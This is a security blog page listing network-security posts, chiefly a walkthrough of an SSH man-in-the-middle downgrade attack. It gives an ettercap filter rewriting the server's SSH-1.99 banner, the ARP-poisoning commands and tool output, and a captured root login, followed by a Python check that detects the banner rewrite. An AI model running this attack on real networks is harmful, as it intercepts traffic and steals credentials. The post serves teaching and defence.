5 posts in 'Network/Network Security'

  1. 2011.01.27 Router Defense
  2. 2011.01.21 ssh mitm with ettercap
  3. 2010.05.07 Wireless LAN Security Guide
  4. 2009.07.20 Nmap 5.0
  5. 2009.03.04 Where can I download a free firewall?
Router Defense takes a deep dive into Cisco router and switch configurations and makes security recommendations. It offers a quick, efficient way to audit network devices and produces actionable practices. The author created this tool because he was frustrated at never seeing a network device in the wild with simple security best practices applied.

Link: http://code.google.com/p/routerdefense/
Posted by 김주일
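Overview
- SSH protocol version negotiation takes place when the server and client communicate
(Default: SSH-1.99 >> version 2)
- Through MITM, the session is made to use the vulnerable SSH version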

SSH v1 VS SSH v2


0x01. Create the filter rule
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
    replace("SSH-1.99","SSH-1.51");
}
 
# etterfilter -o ssh_rb.ef2 ssh_rb.ef

0x02. Attempt the MITM
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)

  eth0 ->    00:0C:29:BF:9E:AC        10.0.0.134     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

SSH : 10.0.0.130:22 -> USER: root  PASS: asdfasdf
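
A defender-side check for the downgrade shown above, as an added example that is not part of the original post: it compares the identification string the server sent with the one the client received, and flags a server that still offers SSH-1. The function names and the sample banners are constructed for illustration.

```python
import re

# Identification string layout from RFC 4253 section 4.2:
#   SSH-protoversion-softwareversion [SP comments] CR LF
IDENT_RE = re.compile(r"^SSH-(\d+\.\d+)-(\S+)(?: .*)?$")


def parse_ident(line):
    """Return (protoversion, softwareversion) from one identification line."""
    m = IDENT_RE.match(line.rstrip("\r\n"))
    if m is None:
        raise ValueError("not an SSH identification string: %r" % line)
    return m.group(1), m.group(2)


def accepts_ssh1(proto):
    # "1.99" is the compatibility marker (RFC 4253 section 5.1): the server
    # speaks 2.0 but will also talk to 1.x clients. Any other 1.x is SSH-1 only.
    return proto.startswith("1.")


def audit_banner(sent_by_server, seen_by_client):
    """Compare the banner captured at the server with the one the client got."""
    findings = []
    srv_proto, srv_sw = parse_ident(sent_by_server)
    cli_proto, cli_sw = parse_ident(seen_by_client)
    if accepts_ssh1(srv_proto):
        findings.append("SERVER_ALLOWS_SSH1")      # fix: restrict sshd to protocol 2
    if (srv_proto, srv_sw) != (cli_proto, cli_sw):
        findings.append("BANNER_MODIFIED_IN_TRANSIT")
    if cli_proto != "1.99" and cli_proto.startswith("1."):
        findings.append("SESSION_WOULD_USE_SSH1")  # client is told only v1 exists
    return findings


# Constructed sample banners (not captured from a real host).
SAMPLES = {
    "rewritten": ("SSH-1.99-OpenSSH_4.3\r\n", "SSH-1.51-OpenSSH_4.3\r\n"),
    "untouched": ("SSH-1.99-OpenSSH_4.3\r\n", "SSH-1.99-OpenSSH_4.3\r\n"),
    "v2_only": ("SSH-2.0-OpenSSH_5.8\r\n", "SSH-2.0-OpenSSH_5.8\r\n"),
}

if __name__ == "__main__":
    for name, (srv, cli) in SAMPLES.items():
        print(name, audit_banner(srv, cli))
```

A server that announces only SSH-2.0 gives the filter nothing to rewrite, so the first finding is the one to clear.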



References
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter


Posted by 김주일